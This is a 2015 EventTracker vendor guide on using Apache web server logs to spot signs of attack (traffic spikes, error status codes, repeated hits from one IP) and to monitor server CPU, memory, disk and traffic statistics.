Apache: Analyze Logs for Malicious Activities & Monitor Server Performance



Similar documents
Enable File and Folder Auditing

EventTracker: Configuring DLA Extension for AWStats Report AWStats Reports

Integrate Microsoft Windows Hyper V

EventTracker: Configuring DLA Extension for AWStats report AWStats Reports

Integrating Symantec Endpoint Protection

Integrate Cisco IronPort Web Security Appliance (WSA)

Integrate Cisco IronPort Security Appliance (ESA)

How To- Create Local Account and Active Directory Authentication EventTracker Enterprise

Integrating Juniper Netscreen (ScreenOS)

Integrate Websense Web Security Gateway (WSG)

Integrating Barracuda Web Application Firewall

IIS Web Server Configuration Guide

Monitor Mobile Devices via ActiveSync Using EventTracker

Monitoring SharePoint 2007/2010/2013 Server Using Event Tracker

IIS Web Server Configuration Guide

EventTracker: Support to Non English Systems

Integrate Astaro Security Gateway

How to Install MS SQL Server Express

Virtual Collection Points

Fifty Critical Alerts for Monitoring Windows Servers Best practices

Integrate Check Point Firewall

Monitoring Windows Workstations Seven Important Events

Monitoring Microsoft SQL Server Audit Logs with EventTracker The Importance of Consolidation, Correlation, and Detection Enterprise Security Series

Secure IIS Web Server with SSL

Upgrade Guide. Upgrading to EventTracker v6.0. Upgrade Guide Columbia Gateway Drive, Suite 250 Publication Date: Sep 20, 2007.

Monitor DHCP Logs. EventTracker. EventTracker Centre Park Drive Columbia MD Publication Date: July 16, 2009

Pipeliner CRM Phaenomena Guide Sales Target Tracking Pipelinersales Inc.

Meeting HIPAA Compliance with EventTracker

EventTracker Enterprise v7.3 Installation Guide

Pipeliner CRM Phaenomena Guide Sales Pipeline Management Pipelinersales Inc.

Pipeliner CRM Phaenomena Guide Add-In for MS Outlook Pipelinersales Inc.

Understanding Change Management

EventTracker Architecture Handling Millions of Events Each Day

Pipeliner CRM Phaenomena Guide Administration & Setup Pipelinersales Inc.

Pipeliner CRM Phaenomena Guide Opportunity Management Pipelinersales Inc.

Hyper-V Server 2008 Getting Started Guide

Lab Answer Key for Module 6: Configuring and Managing Windows SharePoint Services 3.0. Table of Contents Lab 1: Configuring and Managing WSS 3.

Pipeliner CRM Phaenomena Guide Lead Management Pipelinersales Inc.

EventTracker Knowledge Update

CS 558 Internet Systems and Technologies

BizTalk Server Business Activity Monitoring. Microsoft Corporation Published: April Abstract

How to - Install EventTracker and Change Audit Agent

Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall

Deploying the Workspace Application for Microsoft SharePoint Online

Pipeliner CRM Phaenomena Guide Getting Started with Pipeliner Pipelinersales Inc.

Application Firewall Overview. Published: February 2007 For the latest information, please see

Technical Brief for Windows Home Server Remote Access

Parallels Plesk Panel

Windows Small Business Server 2003 Upgrade Best Practices

SmoothWall Virtual Appliance

Intel Storage System SSR212CC Enclosure Management Software Installation Guide For Red Hat* Enterprise Linux

UPGRADE. Upgrading Microsoft Dynamics Entrepreneur to Microsoft Dynamics NAV. Microsoft Dynamics Entrepreneur Solution.

Installation and configuration guide

How To Set Up A Load Balancer With Windows 2010 Outlook 2010 On A Server With A Webmux On A Windows Vista V (Windows V2) On A Network With A Server (Windows) On

JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City

Integrating Trend Micro OfficeScan 10 EventTracker v7.x

Fifty Critical Alerts for Monitoring Windows Servers Best Practices

Deploying Citrix MetaFrame on IBM eserver BladeCenter with FAStT Storage Planning / Implementation

THE 2014 THREAT DETECTION CHECKLIST. Six ways to tell a criminal from a customer.

Microsoft Dynamics GP SQL Server Reporting Services Guide

Usage Analysis Tools in SharePoint Products and Technologies

Reference Architecture: Enterprise Security For The Cloud

Webmetrics Web Monitoring Getting Started Guide

Contents Firewall Monitor Overview Getting Started Setting Up Firewall Monitor Attack Alerts Viewing Firewall Monitor Attack Alerts

PHD Virtual Backup for Hyper-V

Veeam Task Manager for Hyper-V

Streamlining Web and Security

Overview of Microsoft Office 365 Development

Lab Answer Key for Module 9: Active Directory Domain Services. Table of Contents Lab 1: Exploring Active Directory Domain Services 1

Intrusion Detection in AlienVault

Using Microsoft Performance Monitor. Guide

Solutions for Microsoft Project Server and Microsoft Dynamics GP Timesheet Integration

Lab Answer Key for Module 11: Managing Transactions and Locks

Microsoft Dynamics CRM 2011 Performance Counters

January 4, (Revision 1) The newest version of this document is available at the following URL:

CINSAY RELEASE NOTES. Cinsay Product Updates and New Features V2.1

FortiWeb 5.0, Web Application Firewall Course #251

The Top Ten Insider Threats and How to Prevent Them

Security Event Management. February 7, 2007 (Revision 5)

Installation and configuration guide

Improving Performance of Microsoft CRM 3.0 by Using a Dedicated Report Server

HTExploit: Bypassing htaccess Restrictions

Hardening Guide for EventTracker Server

The 2007 R2 Version of Microsoft Office Communicator Mobile for Windows Mobile: Frequently Asked Questions

Microsoft SQL Server 2008 R2 Enterprise Edition and Microsoft SharePoint Server 2010

AvePoint SearchAll for Microsoft Dynamics CRM

5 Pillars for Oracle WCM Optimization: Supercharged Web Content Management BILLY CRIPE WITH STEVE FAHEY & MARIAH BAILEY FISHBOWL SOLUTIONS, INC.

Data Collection Agent for Active Directory

Introduction to Hyper-V High- Availability with Failover Clustering

Monitoring IBM HMC Server. eg Enterprise v6

Microsoft Dynamics GP. Electronic Signatures

A Layperson s Guide To DoS Attacks

Merging Network Configuration and Network Traffic Data in ISP-Level Analyses

Lab Answer Key for Module 1: Installing and Configuring Windows Server Table of Contents Lab 1: Configuring Windows Server

Allan Hirt Clustering MVP

SQL Server 2005 Reporting Services (SSRS)

Heroix Longitude Quick Start Guide V7.1

orrelog Ping Monitor Adapter Software Users Manual

April 11, (Revision 2)

Integrating Business Portal 3.0 with Microsoft Office SharePoint Portal Server 2003: A Natural Fit

Transcription:

Apache: Analyze Logs for Malicious Activities & Monitor Server Performance EventTracker v7.6 Publication Date: Feb 12, 2015 EventTracker 8815 Centre Park Drive Columbia MD 21045 www.eventtracker.com

About this Guide: This guide will help the end user in analyzing the logs for malicious activities and will also help them in monitoring the server performance. Scope: The configurations detailed in this guide are consistent with EventTracker Enterprise version 7.6. Audience: The users are those who wish to analyze logs for malicious activities and track the server performance. The information contained in this document represents the current view of Prism Microsystems Inc. on the issues discussed as of the date of publication. Because Prism Microsystems must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Prism Microsystems, and Prism Microsystems cannot guarantee the accuracy of any information presented after the date of publication. This document is for informational purposes only. Prism Microsystems MAKES NO WARRANTIES, EXPRESS OR IMPLIED, AS TO THE INFORMATION IN THIS DOCUMENT. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, this paper may be freely distributed without permission from Prism, as long as its content is unaltered, nothing is added to the content and credit to Prism is provided. Prism Microsystems may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Prism Microsystems, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property. The example companies, organizations, products, people and events depicted herein are fictitious. No association with any real company, organization, product, person or event is intended or should be inferred. 2015 Prism Microsystems Corporation. All rights reserved. The names of actual companies and products mentioned herein may be the trademarks of their respective owners. 1

Table of Contents Introduction: 3 Identifying clues for attack:..4 Spikes visit in a specific duration:..4 Hits with 4xx, 5xx status codes:..5 Same IP address making multiple visits in a short duration:..6 Web Site Attacks Exploiting Software Vulnerabilities:....7 Monitoring Performance:... 7 Monitoring CPU/Memory/Disk usage:..8 Web Traffic Statistics:..8 2

Introduction Detecting an attack that has occurred is a daunting task. One has to go through various logs to arrive at a conclusion. EventTracker provides various statistics in the form of behavior, dashboards and reports to reduce the amount of logs; one has to parse to be able to conclude on an attack. Below are some of the pointers which can lead you to analyze the performance and attacks on Apache webserver. It is not just the attacks but also the performance parameters of the web server, which are important. Hence, it is important to check that the server is performing optimally on memory, disk and CPU wise. It is advised to keep track of low disk, high CPU/high memory usage on the Apache server. 3

Identifying clues of Attack Here are the important areas to lookout, for identifying the malicious or attacks that might be occurring. Some of the indicators mentioned below may require further analysis for identifying source or nature of attack. Some of the indicator may also point out to malfunctioning of web server or programmatic error in the web application hosted on the server. NOTE: The details mentioned in this section would be of great interest to a Security Analyst for identifying attacks and securing the web server from future web attacks. Spikes visit in a specific duration There is usually a pattern or average visit observed on a website. There may be spikes on a website for a short duration occasionally due to a webinar or discount sale, etc. But on many occasions this also could indicate a hacker trying to attack website. Figure: 1 4

The above graph shows a Spike in hit count. What to lookout for? Is the traffic from a single or handful of IP addresses only? If from a single or handful of IP addresses then what is the IP reputation or WHOIS information about the IP address EventTracker helps with: Flex Dashboard with hit count for last 24 hours. On clicking the graph, details of visits during that duration is shown. Behavior with client IP addresses activity which can be used for out of ordinary or with list management. Hits with 4xx, 5xx status codes HTTP Status 200 indicates an OK status regarding the request received to the server. Apart from this code other codes like 3xx, 4xx or 5xx indicate an alert condition Here is the link with list of all status codes and its meaning. http://www.w3schools.com/tags/ref_httpmessages.asp Figure: 2 5

The above graph shows hits with status 403 and some with 404. What to lookout for? A log entry with any of the non 200 status codes doesn t mean an attack condition. But these status codes provide information which may be useful for bringing to the notice of web-admin. Example: Status code 404 means the page/resource is not available at the location. This might mean that users are looking for a specific page on the site. This might be an advertisement link put up by the website owners on some other site but when clicked, throws error. It would be useful to bring these links to the notice of the web-admin for taking corrective actions. A log entry with 5xx error means the server is misconfigured or showing error messages to the users. It would be important to inform the web-admin. EventTracker helps with: Dashboard with count for each status code found in last 24 hours. Clicking on the graph shows the details. A behavior for tracking new and out of ordinary activity for each status code. Same IP address making multiple visits in a short duration As mentioned earlier, any spike in hits count or specific IP address trying to access the page(s) in a website multiple times in a short span of time might be an indicator of attack. Figure: 3 6

The above graph shows two IP addresses having higher hits. What to lookout for? What is the IP reputation or WHOIS information about the IP address? Whether the same IP address was found to have done any other activity on the web server? EventTracker helps with: Flex Dashboard with top 10 client IP address found in last 24 hours. On clicking the graph, details of visits during that duration is shown. Behavior with client IP addresses activity which can be used for out of ordinary or with list management. Web Site Attacks Exploiting Software Vulnerabilities New web-based attack types and vectors are coming out every day; this is worrying the enterprises who are taking extra steps to secure the websites. Below mentioned are some of the common web attacks observed. 1) SQL Injection 2) Cross site Scripting 3) Remote file inclusion 4) JavaScript injection It is difficult to identify the attack by looking at the logs. It requires pattern analysis and keywords detection. EventTracker helps with: Pre-defined Website attack reports for the common attack types identified by OWASP. These reports can be scheduled to be generated on a day-day basis. These reports provide pointers to the attacks. Further analysis needs to be conducted for assessing the attack impact. Monitoring Performance NOTE: The details mentioned in this section would be of great interest to a System Administrator for monitoring the web server s vital parameters memory, CPU usages and in turn making sure the web server is up and performing optimally. 7

Monitoring CPU/Memory/Disk usage Figure: 4 The graph shows trend of remaining disk space for the last 7 days. What to lookout for? Is the Apache server having frequent spikes in CPU usage? Is the memory usage within threshold limits? Are the disk partitions running out of space? EventTracker helps with: Dashboard for monitoring CPU & memory usage within defined threshold. Alerts when low disk space, continuous high CPU & memory usage are observed. Web Traffic Statistics NOTE: The details mentioned under this section would be of great interest to a Website Owner for monitoring the web server s traffic trends and page hits. 8

Apache logs provide a wealth of information when analyzed and correlated. This statistics would be of great help for people who are more concerned about the website traffic and usage and less on security aspect. Some of the common questions raised would be: Are there any 404- File not found errors? Which are the commonly used browsers and their versions? How many are accessing site through Smartphone/Tab? What is the trend of hits count on the site? Figure: 5 Figure: 6 9

Figure: 7 EventTracker helps with: AWStat log analysis report which provides various statistical figures and analytical data like trend observed in the recent days. Flex Dashboard with hit count for last 24 hours. On clicking the graph, details of visits during that duration is shown. A behavior for tracking new and out of ordinary activity of each status code. 10

11

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information